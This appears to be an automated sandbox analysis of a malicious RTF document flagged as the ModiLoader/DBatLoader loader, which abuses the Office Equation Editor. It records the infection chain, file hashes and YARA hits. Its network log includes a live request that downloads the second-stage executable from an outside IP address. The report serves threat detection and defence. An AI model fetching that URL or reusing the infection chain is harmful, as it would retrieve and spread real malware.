Analysis
-
max time kernel
144s -
max time network
119s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
23-09-2024 01:37
Static task
static1
Behavioral task
behavioral1
Sample
eb0786d23a2ada26a937a41d56a96514a3df0027ff857d0407d462adfba18ddb.rtf
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
eb0786d23a2ada26a937a41d56a96514a3df0027ff857d0407d462adfba18ddb.rtf
Resource
win10v2004-20240802-en
General
-
Target
eb0786d23a2ada26a937a41d56a96514a3df0027ff857d0407d462adfba18ddb.rtf
-
Size
78KB
-
MD5
d63c7600ca42fe65af91ae662ef7b637
-
SHA1
6f8bba7b9751ed550d0bd7f6f29e7229888ad6f9
-
SHA256
eb0786d23a2ada26a937a41d56a96514a3df0027ff857d0407d462adfba18ddb
-
SHA512
83f20a16b336f08d817bc427b39a62a0957ec4bf481b10a320e184c378e227fc2bae513245a18c056fdd34e53f0e6b192f6ca2cb16ad0ca123fdd2938dd58427
-
SSDEEP
384:vnHdoOarkwlJbmbKLY17V/W7ZftG5eqVdwRQb65Y2zdfGxswDRa:vnHmOarkwTzs174geqVCFux7a
Malware Config
Signatures
-
ModiLoader, DBatLoader
ModiLoader is a Delphi loader that misuses cloud services to download other malicious families.
-
ModiLoader Second Stage 60 IoCs
resource yara_rule behavioral1/memory/2700-20-0x0000000003680000-0x0000000004680000-memory.dmp modiloader_stage2 behavioral1/memory/2700-29-0x0000000003680000-0x0000000004680000-memory.dmp modiloader_stage2 behavioral1/memory/2700-109-0x0000000003680000-0x0000000004680000-memory.dmp modiloader_stage2 behavioral1/memory/2700-107-0x0000000003680000-0x0000000004680000-memory.dmp modiloader_stage2 behavioral1/memory/2700-70-0x0000000003680000-0x0000000004680000-memory.dmp modiloader_stage2 behavioral1/memory/2700-69-0x0000000003680000-0x0000000004680000-memory.dmp modiloader_stage2 behavioral1/memory/2700-67-0x0000000003680000-0x0000000004680000-memory.dmp modiloader_stage2 behavioral1/memory/2700-65-0x0000000003680000-0x0000000004680000-memory.dmp modiloader_stage2 behavioral1/memory/2700-64-0x0000000003680000-0x0000000004680000-memory.dmp modiloader_stage2 behavioral1/memory/2700-61-0x0000000003680000-0x0000000004680000-memory.dmp modiloader_stage2 behavioral1/memory/2700-59-0x0000000003680000-0x0000000004680000-memory.dmp modiloader_stage2 behavioral1/memory/2700-57-0x0000000003680000-0x0000000004680000-memory.dmp modiloader_stage2 behavioral1/memory/2700-55-0x0000000003680000-0x0000000004680000-memory.dmp modiloader_stage2 behavioral1/memory/2700-54-0x0000000003680000-0x0000000004680000-memory.dmp modiloader_stage2 behavioral1/memory/2700-51-0x0000000003680000-0x0000000004680000-memory.dmp modiloader_stage2 behavioral1/memory/2700-49-0x0000000003680000-0x0000000004680000-memory.dmp modiloader_stage2 behavioral1/memory/2700-47-0x0000000003680000-0x0000000004680000-memory.dmp modiloader_stage2 behavioral1/memory/2700-46-0x0000000003680000-0x0000000004680000-memory.dmp modiloader_stage2 behavioral1/memory/2700-44-0x0000000003680000-0x0000000004680000-memory.dmp modiloader_stage2 behavioral1/memory/2700-43-0x0000000003680000-0x0000000004680000-memory.dmp modiloader_stage2 behavioral1/memory/2700-41-0x0000000003680000-0x0000000004680000-memory.dmp modiloader_stage2 behavioral1/memory/2700-105-0x0000000003680000-0x0000000004680000-memory.dmp modiloader_stage2 behavioral1/memory/2700-39-0x0000000003680000-0x0000000004680000-memory.dmp modiloader_stage2 behavioral1/memory/2700-102-0x0000000003680000-0x0000000004680000-memory.dmp modiloader_stage2 behavioral1/memory/2700-99-0x0000000003680000-0x0000000004680000-memory.dmp modiloader_stage2 behavioral1/memory/2700-97-0x0000000003680000-0x0000000004680000-memory.dmp modiloader_stage2 behavioral1/memory/2700-38-0x0000000003680000-0x0000000004680000-memory.dmp modiloader_stage2 behavioral1/memory/2700-94-0x0000000003680000-0x0000000004680000-memory.dmp modiloader_stage2 behavioral1/memory/2700-92-0x0000000003680000-0x0000000004680000-memory.dmp modiloader_stage2 behavioral1/memory/2700-89-0x0000000003680000-0x0000000004680000-memory.dmp modiloader_stage2 behavioral1/memory/2700-87-0x0000000003680000-0x0000000004680000-memory.dmp modiloader_stage2 behavioral1/memory/2700-85-0x0000000003680000-0x0000000004680000-memory.dmp modiloader_stage2 behavioral1/memory/2700-83-0x0000000003680000-0x0000000004680000-memory.dmp modiloader_stage2 behavioral1/memory/2700-81-0x0000000003680000-0x0000000004680000-memory.dmp modiloader_stage2 behavioral1/memory/2700-78-0x0000000003680000-0x0000000004680000-memory.dmp modiloader_stage2 behavioral1/memory/2700-75-0x0000000003680000-0x0000000004680000-memory.dmp modiloader_stage2 behavioral1/memory/2700-73-0x0000000003680000-0x0000000004680000-memory.dmp modiloader_stage2 behavioral1/memory/2700-71-0x0000000003680000-0x0000000004680000-memory.dmp modiloader_stage2 behavioral1/memory/2700-35-0x0000000003680000-0x0000000004680000-memory.dmp modiloader_stage2 behavioral1/memory/2700-68-0x0000000003680000-0x0000000004680000-memory.dmp modiloader_stage2 behavioral1/memory/2700-66-0x0000000003680000-0x0000000004680000-memory.dmp modiloader_stage2 behavioral1/memory/2700-63-0x0000000003680000-0x0000000004680000-memory.dmp modiloader_stage2 behavioral1/memory/2700-62-0x0000000003680000-0x0000000004680000-memory.dmp modiloader_stage2 behavioral1/memory/2700-60-0x0000000003680000-0x0000000004680000-memory.dmp modiloader_stage2 behavioral1/memory/2700-58-0x0000000003680000-0x0000000004680000-memory.dmp modiloader_stage2 behavioral1/memory/2700-56-0x0000000003680000-0x0000000004680000-memory.dmp modiloader_stage2 behavioral1/memory/2700-53-0x0000000003680000-0x0000000004680000-memory.dmp modiloader_stage2 behavioral1/memory/2700-52-0x0000000003680000-0x0000000004680000-memory.dmp modiloader_stage2 behavioral1/memory/2700-50-0x0000000003680000-0x0000000004680000-memory.dmp modiloader_stage2 behavioral1/memory/2700-48-0x0000000003680000-0x0000000004680000-memory.dmp modiloader_stage2 behavioral1/memory/2700-45-0x0000000003680000-0x0000000004680000-memory.dmp modiloader_stage2 behavioral1/memory/2700-42-0x0000000003680000-0x0000000004680000-memory.dmp modiloader_stage2 behavioral1/memory/2700-30-0x0000000003680000-0x0000000004680000-memory.dmp modiloader_stage2 behavioral1/memory/2700-32-0x0000000003680000-0x0000000004680000-memory.dmp modiloader_stage2 behavioral1/memory/2700-40-0x0000000003680000-0x0000000004680000-memory.dmp modiloader_stage2 behavioral1/memory/2700-37-0x0000000003680000-0x0000000004680000-memory.dmp modiloader_stage2 behavioral1/memory/2700-36-0x0000000003680000-0x0000000004680000-memory.dmp modiloader_stage2 behavioral1/memory/2700-34-0x0000000003680000-0x0000000004680000-memory.dmp modiloader_stage2 behavioral1/memory/2700-33-0x0000000003680000-0x0000000004680000-memory.dmp modiloader_stage2 behavioral1/memory/2700-31-0x0000000003680000-0x0000000004680000-memory.dmp modiloader_stage2 -
Blocklisted process makes network request 1 IoCs
flow pid Process 3 2660 EQNEDT32.EXE -
Downloads MZ/PE file
-
Executes dropped EXE 1 IoCs
pid Process 2700 audiodg.exe -
Loads dropped DLL 5 IoCs
pid Process 2660 EQNEDT32.EXE 2660 EQNEDT32.EXE 1496 WerFault.exe 1496 WerFault.exe 1496 WerFault.exe -
Drops file in Windows directory 1 IoCs
description ioc Process File opened for modification C:\Windows\Debug\WIA\wiatrace.log WINWORD.EXE -
Program crash 1 IoCs
pid pid_target Process procid_target 1496 2700 WerFault.exe 30 -
System Location Discovery: System Language Discovery 1 TTPs 3 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WINWORD.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language EQNEDT32.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language audiodg.exe -
Office loads VBA resources, possible macro or embedded object present
-
Launches Equation Editor 1 TTPs 1 IoCs
Equation Editor is an old Office component often targeted by exploits such as CVE-2017-11882.
pid Process 2660 EQNEDT32.EXE -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
pid Process 2796 WINWORD.EXE -
Suspicious use of SetWindowsHookEx 2 IoCs
pid Process 2796 WINWORD.EXE 2796 WINWORD.EXE -
Suspicious use of WriteProcessMemory 12 IoCs
description pid Process procid_target PID 2660 wrote to memory of 2700 2660 EQNEDT32.EXE 30 PID 2660 wrote to memory of 2700 2660 EQNEDT32.EXE 30 PID 2660 wrote to memory of 2700 2660 EQNEDT32.EXE 30 PID 2660 wrote to memory of 2700 2660 EQNEDT32.EXE 30 PID 2796 wrote to memory of 2776 2796 WINWORD.EXE 33 PID 2796 wrote to memory of 2776 2796 WINWORD.EXE 33 PID 2796 wrote to memory of 2776 2796 WINWORD.EXE 33 PID 2796 wrote to memory of 2776 2796 WINWORD.EXE 33 PID 2700 wrote to memory of 1496 2700 audiodg.exe 34 PID 2700 wrote to memory of 1496 2700 audiodg.exe 34 PID 2700 wrote to memory of 1496 2700 audiodg.exe 34 PID 2700 wrote to memory of 1496 2700 audiodg.exe 34
Processes
-
C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\eb0786d23a2ada26a937a41d56a96514a3df0027ff857d0407d462adfba18ddb.rtf"1⤵
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2796 -
C:\Windows\splwow64.exeC:\Windows\splwow64.exe 122882⤵PID:2776
-
-
C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE"C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding1⤵
- Blocklisted process makes network request
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Launches Equation Editor
- Suspicious use of WriteProcessMemory
PID:2660 -
C:\Users\Admin\AppData\Roaming\audiodg.exe"C:\Users\Admin\AppData\Roaming\audiodg.exe"2⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2700 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2700 -s 7483⤵
- Loads dropped DLL
- Program crash
PID:1496
-
-
Network
-
Remote address:107.175.243.142:80RequestGET /254/audiodg.exe HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)
Host: 107.175.243.142
Connection: Keep-Alive
ResponseHTTP/1.1 200 OK
Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
Last-Modified: Thu, 12 Sep 2024 05:32:53 GMT
ETag: "19d000-621e570328fe3"
Accept-Ranges: bytes
Content-Length: 1691648
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: application/lnk
-
Remote address:8.8.8.8:53Requestmaan2u.comIN AResponsemaan2u.comIN A112.137.173.77
-
42.2kB 1.7MB 857 1260
HTTP Request
GET http://107.175.243.142/254/audiodg.exeHTTP Response
200 -
190 B 92 B 4 2
-
344 B 219 B 5 5
-
288 B 219 B 5 5
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
20KB
MD5acec6ef82a478b45a9d699ce4cbb515c
SHA132a804b7f1a8530ffabeb8a8c518f752ea77c657
SHA2560b99b09e61f842069b6a665d36c40389d362ed9f368ecb8dd2e2c1b9fef3fed1
SHA512c77436668bfd27a4eddb857ad0733ab842271047fbbd3d061233ca66d4a17cfd5d0fda19d552dcf725fa54188f8662a0baaca1b3694b45c8ff68c9225da42e33
-
Filesize
1.6MB
MD5d2d166937422f379e6dd15041d83af21
SHA184e0e1e9371b52e6682303fc11b02b69a3df782d
SHA256c59da5938f667c04ca2ba3639b6cb3d5813fc189d4b2f412613b4bfa36ae0664
SHA5123eb977c92a6a541bafd8f5c70d6263c21be019e6124efecb5bd237cbdd24d02eb150f08c9c1bbd3e54a54ef817041a293b03d63d15ec54f18eaa10f888adf8cf